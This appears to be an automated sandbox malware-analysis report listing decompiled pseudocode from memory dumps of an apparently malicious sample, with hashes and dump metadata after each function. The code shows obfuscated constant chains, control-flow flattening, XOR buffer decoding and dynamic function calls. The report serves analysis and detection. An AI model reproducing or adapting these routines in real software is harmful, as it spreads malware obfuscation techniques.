                                          				_v576 = _v576 ^ 0x00296382;
                                          				_v568 = 0xc477;
                                          				_v568 = _v568 + 0xffff852d;
                                          				_v568 = _v568 ^ 0x00000bf7;
                                          				_t160 = _v568;
                                          				_v580 = 0xe5ab;
                                          				_v580 = _v580 + 0x26f9;
                                          				_v580 = _v580 + 0xffffb6c9;
                                          				_v580 = _v580 ^ 0x0000c36f;
                                          				do {
                                          					while(_t136 != 0x96b3cdc) {
                                          						if(_t136 == 0xc60f3b0) {
                                          							_t129 = E006D9AC7(_v572, _v584,  &_v556, _v560, _t160);
                                          							_t163 =  &(_t163[3]);
                                          							L11:
                                          							asm("sbb ecx, ecx");
                                          							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
                                          							continue;
                                          						}
                                          						if(_t136 == 0x1f7f9ad4) {
                                          							_v556 = 0x22c;
                                          							_t129 = E006C76F7( &_v556, _v592, _v600, _t160);
                                          							goto L11;
                                          						}
                                          						if(_t136 == 0x28d0c761) {
                                          							return E006D4F7D(_v576, _v568, _t160);
                                          						}
                                          						if(_t136 != 0x2dc3f3d6) {
                                          							if(_t136 != 0x30c826c8) {
                                          								goto L16;
                                          							} else {
                                          								_t136 = 0x2dc3f3d6;
                                          								continue;
                                          							}
                                          							L19:
                                          							return _t129;
                                          						}
                                          						_t129 = E006C1C88(_t136, _t136, _v580);
                                          						_t160 = _t129;
                                          						_t163 =  &(_t163[3]);
                                          						if(_t129 != 0xffffffff) {
                                          							_t136 = 0x1f7f9ad4;
                                          							continue;
                                          						}
                                          						goto L19;
                                          					}
                                          					_push(_t156);
                                          					_push( &_v556);
                                          					if(_a4() == 0) {
                                          						_t136 = 0x28d0c761;
                                          						goto L16;
                                          					} else {
                                          						_t136 = 0xc60f3b0;
                                          						continue;
                                          					}
                                          					goto L19;
                                          					L16:
                                          				} while (_t136 != 0x22b9bf83);
                                          				return _t129;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: 4.$gG
                                          • API String ID: 2962429428-791606841
                                          • Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                          • Instruction ID: a729aa62d97ebc4c38413cc94c0fc489e02018965f7952b3ff85f30978dd8ef6
                                          • Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                          • Instruction Fuzzy Hash: 3061BC715187419BD7A8CF24C88985FBBE2FFC4318F100A1EF586962A0D7798A49CB87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006CE05A(void* __ecx, void* __edx) {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed short _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _t107;
                                          				signed short _t113;
                                          				signed short _t116;
                                          				signed short _t118;
                                          				signed int _t120;
                                          				signed int _t121;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				intOrPtr _t124;
                                          				signed short _t128;
                                          				signed short* _t143;
                                          				signed short _t145;
                                          				void* _t146;
                                          				signed int* _t147;
                                          
                                          				_t147 =  &_v48;
                                          				_v16 = 0x6d293b;
                                          				_v12 = 0x468ef5;
                                          				_v8 = 0;
                                          				_v4 = 0;
                                          				_t146 = __ecx;
                                          				_v40 = 0x7b4e;
                                          				_v40 = _v40 + 0xffff3b83;
                                          				_v40 = _v40 + 0xffffa7a8;
                                          				_v40 = _v40 ^ 0xffff5e78;
                                          				_v20 = 0xb6a1;
                                          				_t120 = 0x38;
                                          				_v20 = _v20 / _t120;
                                          				_v20 = _v20 ^ 0x00007f71;
                                          				_v44 = 0x997f;
                                          				_v44 = _v44 ^ 0xba9196e9;
                                          				_v44 = _v44 ^ 0x66374254;
                                          				_t26 =  &_v44; // 0x66374254
                                          				_t121 = 0xe;
                                          				_v44 =  *_t26 / _t121;
                                          				_v44 = _v44 ^ 0x0fc29c0d;
                                          				_v48 = 0x4c26;
                                          				_v48 = _v48 | 0xfd76fef6;
                                          				_v48 = _v48 >> 3;
                                          				_v48 = _v48 ^ 0x1faed217;
                                          				_v24 = 0xc5b2;
                                          				_t122 = 0x42;
                                          				_v24 = _v24 * 0x67;
                                          				_v24 = _v24 << 9;
                                          				_v24 = _v24 ^ 0x9f1566f7;
                                          				_v28 = 0x55d;
                                          				_v28 = _v28 << 0xb;
                                          				_v28 = _v28 / _t122;
                                          				_v28 = _v28 ^ 0x0000f55e;
                                          				_v32 = 0x8f6f;
                                          				_t123 = 6;
                                          				_v32 = _v32 * 0x4f;
                                          				_v32 = _v32 + 0xffffe8fc;
                                          				_v32 = _v32 ^ 0x002c0f4c;
                                          				_v36 = 0xd672;
                                          				_v36 = _v36 / _t123;
                                          				_v36 = _v36 + 0xffffc0a7;
                                          				_v36 = _v36 ^ 0xffffa997;
                                          				_t107 = _v40;
                                          				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
                                          				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
                                          					L13:
                                          					return 1;
                                          				} else {
                                          					_t145 = _t124 + __ecx;
                                          					while(1) {
                                          						_t110 =  *((intOrPtr*)(_t145 + 0xc));
                                          						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
                                          							goto L13;
                                          						}
                                          						_t128 = E006D4AAF(_t110 + _t146, _v20, _v44, _v48);
                                          						_v40 = _t128;
                                          						__eflags = _t128;
                                          						if(_t128 == 0) {
                                          							L15:
                                          							return 0;
                                          						}
                                          						_t143 =  *_t145 + _t146;
                                          						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
                                          						while(1) {
                                          							_t113 =  *_t143;
                                          							__eflags = _t113;
                                          							if(__eflags == 0) {
                                          								break;
                                          							}
                                          							if(__eflags >= 0) {
                                          								_t115 = _t113 + 2 + _t146;
                                          								__eflags = _t113 + 2 + _t146;
                                          							} else {
                                          								_t115 = _t113 & 0x0000ffff;
                                          							}
                                          							_t116 = E006C6228(_v24, _v28, _v32, _v36, _t128, _t115);
                                          							_t147 =  &(_t147[4]);
                                          							__eflags = _t116;
                                          							if(_t116 == 0) {
                                          								goto L15;
                                          							} else {
                                          								_t128 = _v40;
                                          								_t143 =  &(_t143[2]);
                                          								 *_t118 = _t116;
                                          								_t118 = _t118 + 4;
                                          								__eflags = _t118;
                                          								continue;
                                          							}
                                          						}
                                          						_t145 = _t145 + 0x14;
                                          						__eflags = _t145;
                                          					}
                                          					goto L13;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &L$TB7f
                                          • API String ID: 0-2122134793
                                          • Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                          • Instruction ID: 4f1dc0f1a37a6961da631f6d37c7eb00395b202ea0a3aeb1a047fcca2aca374f
                                          • Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                          • Instruction Fuzzy Hash: 2C5177716083028FD318CF25D845A2BBBF2FBD4358F144A1DF49996260D779DA4ACF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006CB112() {
                                          				char _v520;
                                          				signed int _v524;
                                          				intOrPtr _v528;
                                          				intOrPtr _v532;
                                          				intOrPtr _v536;
                                          				signed int _v540;
                                          				signed int _v544;
                                          				signed int _v548;
                                          				signed int _v552;
                                          				signed int _v556;
                                          				signed int _v560;
                                          				signed int _v564;
                                          				signed int _v568;
                                          				char* _t91;
                                          				void* _t94;
                                          				intOrPtr _t97;
                                          				signed int _t109;
                                          				signed int _t110;
                                          				short* _t113;
                                          
                                          				_v524 = _v524 & 0x00000000;
                                          				_v536 = 0x15a9e0;
                                          				_t94 = 0x2447ce85;
                                          				_v532 = 0xcaf76;
                                          				_v528 = 0x42cbc4;
                                          				_v544 = 0x1d8c;
                                          				_v544 = _v544 << 8;
                                          				_v544 = _v544 ^ 0x001dbb75;
                                          				_v564 = 0xb98d;
                                          				_v564 = _v564 * 0x6d;
                                          				_v564 = _v564 | 0xb6682b1a;
                                          				_t109 = 0x16;
                                          				_v564 = _v564 / _t109;
                                          				_v564 = _v564 ^ 0x084aef85;
                                          				_v568 = 0xa53e;
                                          				_v568 = _v568 | 0x3e6d869d;
                                          				_t110 = 0x46;
                                          				_v568 = _v568 * 0x2b;
                                          				_v568 = _v568 ^ 0x7c6b3e02;
                                          				_v540 = 0x49b5;
                                          				_v540 = _v540 + 0xbc03;
                                          				_v540 = _v540 ^ 0x0001452b;
                                          				_v556 = 0x9474;
                                          				_v556 = _v556 << 0xb;
                                          				_v556 = _v556 ^ 0xd8ad9d33;
                                          				_v556 = _v556 ^ 0xdc0e2a5f;
                                          				_v560 = 0x11f0;
                                          				_v560 = _v560 + 0xffffe240;
                                          				_v560 = _v560 + 0xb761;
                                          				_v560 = _v560 ^ 0x000087cb;
                                          				_v548 = 0x2457;
                                          				_v548 = _v548 / _t110;
                                          				_v548 = _v548 ^ 0x000075df;
                                          				do {
                                          					while(_t94 != 0x14e9f4e4) {
                                          						if(_t94 == 0x21e9d2a8) {
                                          							_t97 =  *0x6dca2c; // 0x248300
                                          							_t82 = _t97 + 0x230; // 0x710050
                                          							return E006C6636(_t82, _v556, _v560, _v548, _t113);
                                          						}
                                          						if(_t94 == 0x2275b3e1) {
                                          							_t91 = E006D3E3F(_t94,  &_v520, __eflags, _v544, _v564);
                                          							_t94 = 0x14e9f4e4;
                                          							continue;
                                          						}
                                          						if(_t94 != 0x2447ce85) {
                                          							goto L15;
                                          						}
                                          						_t94 = 0x2275b3e1;
                                          					}
                                          					_v552 = 0xe342;
                                          					_v552 = _v552 ^ 0x7b193e87;
                                          					_v552 = _v552 ^ 0x7b19ddc7;
                                          					_t113 =  &_v520 + E006D0ADC( &_v520, _v568, _v540) * 2;
                                          					while(1) {
                                          						_t91 =  &_v520;
                                          						__eflags = _t113 - _t91;
                                          						if(_t113 <= _t91) {
                                          							break;
                                          						}
                                          						__eflags =  *_t113 - 0x5c;
                                          						if( *_t113 != 0x5c) {
                                          							L10:
                                          							_t113 = _t113 - 2;
                                          							__eflags = _t113;
                                          							continue;
                                          						}
                                          						_t76 =  &_v552;
                                          						 *_t76 = _v552 - 1;
                                          						__eflags =  *_t76;
                                          						if( *_t76 == 0) {
                                          							__eflags = _t113;
                                          							L14:
                                          							_t94 = 0x21e9d2a8;
                                          							goto L15;
                                          						}
                                          						goto L10;
                                          					}
                                          					goto L14;
                                          					L15:
                                          					__eflags = _t94 - 0x318d27d3;
                                          				} while (__eflags != 0);
                                          				return _t91;
                                          			}























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: B$W$
                                          • API String ID: 0-584637061
                                          • Opcode ID: b42cd1a0af5cf84cfff31a45a81c548609c2404d3b535a16a5070798f79c7659
                                          • Instruction ID: 44d4c07005fe587321f57eb8afb5fe993e82c64a3afbe45a7c2bcc59c48bf9da
                                          • Opcode Fuzzy Hash: b42cd1a0af5cf84cfff31a45a81c548609c2404d3b535a16a5070798f79c7659
                                          • Instruction Fuzzy Hash: 35416C715083418BD714DF21D586A6FBBE2FBC8758F104A1EF085662A0D7788B4ACF87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006D31E2(void* __eflags) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				char _v52;
                                          				char _v572;
                                          				intOrPtr* _t106;
                                          				signed int _t110;
                                          				signed int _t111;
                                          
                                          				_v52 = 0;
                                          				_v28 = 0x38ff;
                                          				_v28 = _v28 | 0x657975a1;
                                          				_v28 = _v28 ^ 0x65795a60;
                                          				_v36 = 0xb7c2;
                                          				_t110 = 0x62;
                                          				_v36 = _v36 / _t110;
                                          				_v36 = _v36 ^ 0x0000110e;
                                          				_v24 = 0xe00a;
                                          				_v24 = _v24 << 5;
                                          				_v24 = _v24 + 0xffffb393;
                                          				_v24 = _v24 ^ 0x001b9d0d;
                                          				_v20 = 0xfb31;
                                          				_v20 = _v20 + 0xbdbd;
                                          				_v20 = _v20 + 0x1446;
                                          				_v20 = _v20 ^ 0x0001be9a;
                                          				_v40 = 0x7fef;
                                          				_v40 = _v40 >> 1;
                                          				_v40 = _v40 ^ 0x00001ed5;
                                          				_v8 = 0xf1c1;
                                          				_v8 = _v8 << 7;
                                          				_v8 = _v8 + 0x6d97;
                                          				_v8 = _v8 << 9;
                                          				_v8 = _v8 ^ 0xf29c2a73;
                                          				_v32 = 0xb6f2;
                                          				_v32 = _v32 | 0x667f3c4f;
                                          				_v32 = _v32 ^ 0x667f909f;
                                          				_v16 = 0xa641;
                                          				_t111 = 0x3c;
                                          				_v16 = _v16 / _t111;
                                          				_v16 = _v16 >> 7;
                                          				_v16 = _v16 ^ 0x1e480640;
                                          				_v16 = _v16 ^ 0x1e480386;
                                          				_v44 = 0xa73d;
                                          				_v44 = _v44 >> 0xd;
                                          				_v44 = _v44 ^ 0x000057d1;
                                          				_v48 = 0x6a4b;
                                          				_v48 = _v48 << 7;
                                          				_v48 = _v48 ^ 0x00354ae8;
                                          				_v12 = 0x27be;
                                          				_v12 = _v12 ^ 0xc55dd82d;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0xb51d94d3;
                                          				_v12 = _v12 ^ 0x844acffa;
                                          				_t112 = _v28;
                                          				if(E006C1210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
                                          					_t106 =  &_v572;
                                          					if(_v572 != 0) {
                                          						while( *_t106 != 0x5c) {
                                          							_t106 = _t106 + 2;
                                          							if( *_t106 != 0) {
                                          								continue;
                                          							} else {
                                          							}
                                          							goto L6;
                                          						}
                                          						_t112 = 0;
                                          						 *((short*)(_t106 + 2)) = 0;
                                          					}
                                          					L6:
                                          					E006D375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
                                          				}
                                          				return _v52;
                                          			}




















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: `Zye$J5
                                          • API String ID: 0-1569392922
                                          • Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                          • Instruction ID: d70a1a684fb333043a1ea34361c834bb7c4b3603997c09775689fce6fec42238
                                          • Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                          • Instruction Fuzzy Hash: 1F4114B1C0021DEBDF59CFA0C94A9EEBBB5FB08304F108199E111B62A0D7B94B54CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E006D889D(signed int* __ecx, void* __edx, void* __eflags) {
                                          				void* _t50;
                                          				signed int _t57;
                                          				signed int _t74;
                                          				signed int _t75;
                                          				signed int _t84;
                                          				unsigned int _t85;
                                          				unsigned int _t86;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				signed int* _t95;
                                          				signed int* _t96;
                                          				signed int _t97;
                                          				signed int _t98;
                                          				unsigned int _t100;
                                          				void* _t106;
                                          				short _t107;
                                          				void* _t108;
                                          				void* _t109;
                                          
                                          				_push( *((intOrPtr*)(_t108 + 0x30)));
                                          				_push(__ecx);
                                          				E006C602B(_t50);
                                          				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
                                          				_t95 =  &(__ecx[1]);
                                          				_t107 = 0;
                                          				 *((intOrPtr*)(_t108 + 0x34)) = 0;
                                          				 *(_t108 + 0x24) = 0xc5f8;
                                          				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
                                          				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
                                          				 *(_t108 + 0x1c) = 0x21c8;
                                          				_t97 = 0x48;
                                          				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
                                          				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
                                          				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
                                          				 *(_t108 + 0x20) = 0xf93e;
                                          				_t98 = 0xe;
                                          				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
                                          				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
                                          				_t93 =  *__ecx;
                                          				_t96 =  &(_t95[1]);
                                          				_t57 =  *_t95 ^ _t93;
                                          				 *(_t108 + 0x28) = _t93;
                                          				 *(_t108 + 0x2c) = _t57;
                                          				_t32 = _t57 + 1; // 0xf93f
                                          				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
                                          				_t109 = _t108 + 4;
                                          				_t74 = E006C8736(_t100 + _t100);
                                          				 *(_t109 + 0x20) = _t74;
                                          				if(_t74 != 0) {
                                          					_t94 = _t74;
                                          					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
                                          					if(_t106 != 0) {
                                          						_t75 =  *(_t109 + 0x1c);
                                          						do {
                                          							_t84 =  *_t96;
                                          							_t96 =  &(_t96[1]);
                                          							_t85 = _t84 ^ _t75;
                                          							 *_t94 = _t85 & 0x000000ff;
                                          							_t94 = _t94 + 8;
                                          							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
                                          							_t86 = _t85 >> 0x10;
                                          							_t107 = _t107 + 1;
                                          							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
                                          							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
                                          						} while (_t107 < _t106);
                                          						_t74 =  *(_t109 + 0x18);
                                          					}
                                          					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
                                          				}
                                          				return _t74;
                                          			}






















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: Q`${K
                                          • API String ID: 0-3942002812
                                          • Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                          • Instruction ID: 84b7e84890f709048890e93b8b063e7825330f56e8e7527c4cc999e3b63142df
                                          • Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
                                          • Instruction Fuzzy Hash: D531AD72A087118FD314DF29C48456BF7E1FF88318F454A6EE489AB250D774E90A8B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E006D878F(void* __ecx, void* __edx, void* __eflags) {
                                          				signed int* _t40;
                                          				signed int _t42;
                                          				unsigned int* _t55;
                                          				signed int _t56;
                                          				signed int _t58;
                                          				signed int _t65;
                                          				unsigned int _t66;
                                          				unsigned int _t67;
                                          				unsigned int* _t70;
                                          				signed int* _t71;
                                          				signed int* _t72;
                                          				unsigned int _t74;
                                          				void* _t80;
                                          				void* _t82;
                                          				void* _t84;
                                          				void* _t85;
                                          
                                          				_push( *((intOrPtr*)(_t84 + 0x18)));
                                          				_push( *(_t84 + 0x24));
                                          				_push(__ecx);
                                          				_t40 = E006C602B( *((intOrPtr*)(_t84 + 0x18)));
                                          				 *(_t84 + 0x34) = 0x2399;
                                          				_t4 =  &(_t40[1]); // 0x4
                                          				_t71 = _t4;
                                          				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
                                          				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
                                          				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
                                          				 *(_t84 + 0x20) = 0xf668;
                                          				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
                                          				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
                                          				 *(_t84 + 0x1c) = 0x6aea;
                                          				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
                                          				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
                                          				_t58 =  *_t40;
                                          				_t72 =  &(_t71[1]);
                                          				_t42 =  *_t71 ^ _t58;
                                          				 *(_t84 + 0x24) = _t58;
                                          				 *(_t84 + 0x28) = _t42;
                                          				_t23 = _t42 + 1; // 0x1
                                          				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
                                          				_t85 = _t84 + 8;
                                          				_t55 = E006C8736(_t74);
                                          				 *(_t85 + 0x2c) = _t55;
                                          				if(_t55 != 0) {
                                          					_t82 = 0;
                                          					_t70 = _t55;
                                          					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
                                          					if(_t80 != 0) {
                                          						_t56 =  *(_t85 + 0x18);
                                          						do {
                                          							_t65 =  *_t72;
                                          							_t72 =  &(_t72[1]);
                                          							_t66 = _t65 ^ _t56;
                                          							 *_t70 = _t66;
                                          							_t70 =  &(_t70[1]);
                                          							_t67 = _t66 >> 0x10;
                                          							 *((char*)(_t70 - 3)) = _t66 >> 8;
                                          							 *(_t70 - 2) = _t67;
                                          							_t82 = _t82 + 1;
                                          							 *((char*)(_t70 - 1)) = _t67 >> 8;
                                          						} while (_t82 < _t80);
                                          						_t55 =  *(_t85 + 0x28);
                                          					}
                                          					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
                                          				}
                                          				return _t55;
                                          			}




















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 5Ur$j
                                          • API String ID: 0-2435424154
                                          • Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                          • Instruction ID: 88021e26827a0ead32c3d74245ac7dce709d2bb4d6c1cd2dd03da5c7633a882b
                                          • Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
                                          • Instruction Fuzzy Hash: 9031CC72A093018FD314CF28C88585BFBE1EF88714F454B5EE989A7351C734E90ACB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E006D9586(intOrPtr _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				void* _t78;
                                          				void* _t80;
                                          				intOrPtr* _t81;
                                          				intOrPtr _t95;
                                          
                                          				_v40 = _v40 & 0x00000000;
                                          				_v44 = 0x5b9444;
                                          				_v12 = 0xdcba;
                                          				_v12 = _v12 >> 4;
                                          				_v12 = _v12 >> 4;
                                          				_v12 = _v12 + 0x949;
                                          				_v12 = _v12 ^ 0x00001af4;
                                          				_v8 = 0x3cb;
                                          				_v8 = _v8 + 0xffff192d;
                                          				_v8 = _v8 + 0x1519;
                                          				_v8 = _v8 ^ 0xffff4a83;
                                          				_v20 = 0x60da;
                                          				_v20 = _v20 >> 4;
                                          				_t95 = _a4;
                                          				_v20 = _v20 * 0x71;
                                          				_v20 = _v20 ^ 0x0002f52e;
                                          				_v24 = 0x45f5;
                                          				_v24 = _v24 ^ 0x8ddfc3a3;
                                          				_v24 = _v24 | 0x63507c9c;
                                          				_v24 = _v24 ^ 0xefdfb5dc;
                                          				_v32 = 0xfa49;
                                          				_v32 = _v32 ^ 0xb8265659;
                                          				_v32 = _v32 ^ 0xb826ab18;
                                          				_v28 = 0xa34;
                                          				_v28 = _v28 | 0x478cb459;
                                          				_v28 = _v28 ^ 0x0d1ea304;
                                          				_v28 = _v28 ^ 0x4a9200da;
                                          				_v36 = 0x43f7;
                                          				_v36 = _v36 >> 0xb;
                                          				_v36 = _v36 ^ 0x00001d3e;
                                          				_v16 = 0x9c5f;
                                          				_v16 = _v16 * 0x1d;
                                          				_v16 = _v16 * 0x2e;
                                          				_v16 = _v16 << 5;
                                          				_v16 = _v16 ^ 0x65dacbc4;
                                          				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
                                          				_t98 = _t78;
                                          				if(_t78 != 0) {
                                          					_push(0x6dc860);
                                          					_push(_v20);
                                          					_t80 = E006D878F(_v12, _v8, _t98);
                                          					_push(_v32);
                                          					_t93 = _t80;
                                          					_push(_v24);
                                          					_t81 = E006D6965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
                                          					if(_t81 != 0) {
                                          						 *_t81();
                                          					}
                                          					E006D2025(_v28, _t93, _v36, _v16);
                                          				}
                                          				return 0;
                                          			}


















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 4$I
                                          • API String ID: 0-2585635819
                                          • Opcode ID: a24bb9846c83ca912a6058a7247433eee34a5bc889b5bf13f41be7932073bb1e
                                          • Instruction ID: 95abb36557c6b27d441ff77059067bc9a7734d2ba055dacfcca5a2f2255a5661
                                          • Opcode Fuzzy Hash: a24bb9846c83ca912a6058a7247433eee34a5bc889b5bf13f41be7932073bb1e
                                          • Instruction Fuzzy Hash: AA4111B1D0020AABEF04CFA1C94AAEEBBB1FB44314F208159D411B6290D3B9AB55CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E006C7998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				void* _t74;
                                          				intOrPtr _t83;
                                          				signed int _t85;
                                          				signed int _t86;
                                          				signed int _t96;
                                          				intOrPtr* _t97;
                                          
                                          				_t97 = _a4;
                                          				_push(_a12);
                                          				_t96 = _a8;
                                          				_push(_t96);
                                          				_push(_t97);
                                          				E006C602B(_t74);
                                          				_v24 = 0x43bd;
                                          				_v24 = _v24 >> 0xe;
                                          				_v24 = _v24 ^ 0x00002257;
                                          				_v20 = 0xfb35;
                                          				_v20 = _v20 ^ 0x316dcd7c;
                                          				_v20 = _v20 ^ 0x316d5b09;
                                          				_v8 = 0x86ca;
                                          				_t85 = 0x26;
                                          				_v8 = _v8 / _t85;
                                          				_v8 = _v8 + 0xffffb56c;
                                          				_v8 = _v8 ^ 0xffffa5a2;
                                          				_a4 = 0x6ea8;
                                          				_a4 = _a4 | 0xeb58ef4a;
                                          				_a4 = _a4 << 6;
                                          				_t86 = 0x7d;
                                          				_a4 = _a4 / _t86;
                                          				_a4 = _a4 ^ 0x01b6ec6f;
                                          				_v16 = 0xf7ce;
                                          				_v16 = _v16 + 0xffffb713;
                                          				_v16 = _v16 + 0xe2af;
                                          				_v16 = _v16 ^ 0x0001a1e1;
                                          				_v12 = 0x7f90;
                                          				_v12 = _v12 >> 9;
                                          				_v12 = _v12 ^ 0x9419cfce;
                                          				_v12 = _v12 ^ 0x9419fbb9;
                                          				_a8 = 0xab6f;
                                          				_a8 = _a8 * 0x2a;
                                          				_a8 = _a8 >> 0xf;
                                          				_a8 = _a8 | 0x38dd753e;
                                          				_a8 = _a8 ^ 0x38dd1846;
